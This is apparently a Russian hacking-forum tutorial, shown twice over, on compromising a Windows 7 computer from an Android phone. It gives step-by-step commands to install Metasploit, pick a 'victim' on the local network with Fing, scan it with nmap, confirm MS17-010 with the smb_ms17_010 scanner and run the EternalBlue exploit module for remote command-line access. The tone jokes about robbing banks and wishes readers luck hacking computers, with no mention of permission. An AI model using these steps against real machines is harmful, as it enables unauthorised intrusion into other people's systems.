Всё что нам для этого понадобится:
Для начала скачаем
Теперь установим metasploit:
[SRC]apt update
apt upgrade
apt install curl
curl -LO
cd metasploit-framework-4.14.28
./msfconsole[/SRC]
Знаю загрузка довольно долгая но нужно потерпеть сожми яйца в кулак и жди
После всего у нас должен открыться metasploit
После того как вы установили metasploit можете считать что вы Zупер хакер и спокойно идти грабить банк или на урок информатики к Марине Сергеевне.
2)
Сканирование сети c Fing
Теперь посмотрим кто есть в нашей сети:
Для этого удобно использовать утилиту
Вот так выглядит моя локальная сеть(у всех по разному):
И если у вас зрение не минус 40 то можно легко увидеть "USER-ПК"(у всех всё по разному) он и будет нашей жертвой.Выбираем и запоминаем ip нашей жертвы,в моём случае это 192.168.1.104 и сканим его на порты.
3)
Сканирование на открытые порты c nmap
Установим этот чудесный инструмент:
[SRC]apt-get update
apt-get install nmap[/SRC]
ip нашей жертвы,в моём случае это 192.168.1.104, сканим его на порты
nmap ip жертвы
В моём случае это:
[SRC]nmap 192.168.1.104[/SRC]
Есть бесконечное множество настроек nmap но в данный момент подойдёт эта(из за скорости)
Вот что мы видим:
У меня стоит на машине 7 винда и у неё открыт 445 порт,любому более менее шарящему в metasploit человеку сразу понятно что первым делом мы будем юзать эксплоит
4)
Проверка уязвимости
Дальше пойдут скрины с консоли kali nethunter так что не пугайтесь,все команды идентичны с командами в
Для начала мы протестим на сканере возьмёт ли наш эксплоит нашу жертву
в metasploit вводите:
[SRC]
use auxiliary/scanner/smb/smb_ms17_010[/SRC]
Здесь нам нужно указать только ip адрес жертвы
Выглядит это так:
set RHOSTS ip жертвы
В моём случае это:
[SRC]set RHOSTS 192.168.1.104[/SRC]
Запускаем скан командой
[SRC]run[/SRC]
Если мы видим что-то подобное значит хост уязвим к эксплоиту
5)
Теперь завершающая стадия:использование эксплоита
В том же metasploit пишем
[SRC]
use exploit/windows/smb/ms17_010_eternalblue[/SRC]
Здесь нам нужно указать ip жертвы и процесс
Ip жертвы:
Выглядит это так:
set RHOST ip жертвы
В моём случае это:
[SRC]set RHOST 192.168.1.104[/SRC]
И процесс
[SRC]set ProcessName explorer.exe[/SRC]
И после того как вы помолились и поставили икону на обои можно запускать эксплоит
[SRC]exploit[/SRC]
Если всё удачно то тогда мы получим полный доступ к командной строке атакуемого компухтера.
Всем спасибо за внимание!Удачно вам похекать компы!
- Прямые руки
- Телефон на андроиде
- Fing
- nmap
- temux и Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!или kali nethunter
Для начала скачаем
Пожалуйста,
Вход
или
Регистрация
для просмотра содержимого URL-адресов!
Теперь установим metasploit:
[SRC]apt update
apt upgrade
apt install curl
curl -LO
Пожалуйста,
Вход
или
Регистрация
для просмотра содержимого URL-адресов!
cd metasploit-framework-4.14.28
./msfconsole[/SRC]
Знаю загрузка довольно долгая но нужно потерпеть сожми яйца в кулак и жди
После всего у нас должен открыться metasploit

После того как вы установили metasploit можете считать что вы Zупер хакер и спокойно идти грабить банк или на урок информатики к Марине Сергеевне.
2)
Сканирование сети c Fing
Теперь посмотрим кто есть в нашей сети:
Для этого удобно использовать утилиту
Пожалуйста,
Вход
или
Регистрация
для просмотра содержимого URL-адресов!
(<=кликабельно)Вот так выглядит моя локальная сеть(у всех по разному):

И если у вас зрение не минус 40 то можно легко увидеть "USER-ПК"(у всех всё по разному) он и будет нашей жертвой.Выбираем и запоминаем ip нашей жертвы,в моём случае это 192.168.1.104 и сканим его на порты.
3)
Сканирование на открытые порты c nmap
Установим этот чудесный инструмент:
[SRC]apt-get update
apt-get install nmap[/SRC]
ip нашей жертвы,в моём случае это 192.168.1.104, сканим его на порты
nmap ip жертвы
В моём случае это:
[SRC]nmap 192.168.1.104[/SRC]
Есть бесконечное множество настроек nmap но в данный момент подойдёт эта(из за скорости)
Вот что мы видим:

У меня стоит на машине 7 винда и у неё открыт 445 порт,любому более менее шарящему в metasploit человеку сразу понятно что первым делом мы будем юзать эксплоит
Пожалуйста,
Вход
или
Регистрация
для просмотра содержимого URL-адресов!
.4)
Проверка уязвимости
Дальше пойдут скрины с консоли kali nethunter так что не пугайтесь,все команды идентичны с командами в
Пожалуйста,
Вход
или
Регистрация
для просмотра содержимого URL-адресов!
.(Мне так просто реально удобнее)Для начала мы протестим на сканере возьмёт ли наш эксплоит нашу жертву
в metasploit вводите:
[SRC]
use auxiliary/scanner/smb/smb_ms17_010[/SRC]
Здесь нам нужно указать только ip адрес жертвы
Выглядит это так:
set RHOSTS ip жертвы
В моём случае это:
[SRC]set RHOSTS 192.168.1.104[/SRC]
Запускаем скан командой
[SRC]run[/SRC]

Если мы видим что-то подобное значит хост уязвим к эксплоиту
5)
Теперь завершающая стадия:использование эксплоита
В том же metasploit пишем
[SRC]
use exploit/windows/smb/ms17_010_eternalblue[/SRC]
Здесь нам нужно указать ip жертвы и процесс
Ip жертвы:
Выглядит это так:
set RHOST ip жертвы
В моём случае это:
[SRC]set RHOST 192.168.1.104[/SRC]
И процесс
[SRC]set ProcessName explorer.exe[/SRC]

И после того как вы помолились и поставили икону на обои можно запускать эксплоит
[SRC]exploit[/SRC]
Если всё удачно то тогда мы получим полный доступ к командной строке атакуемого компухтера.



Всем спасибо за внимание!Удачно вам похекать компы!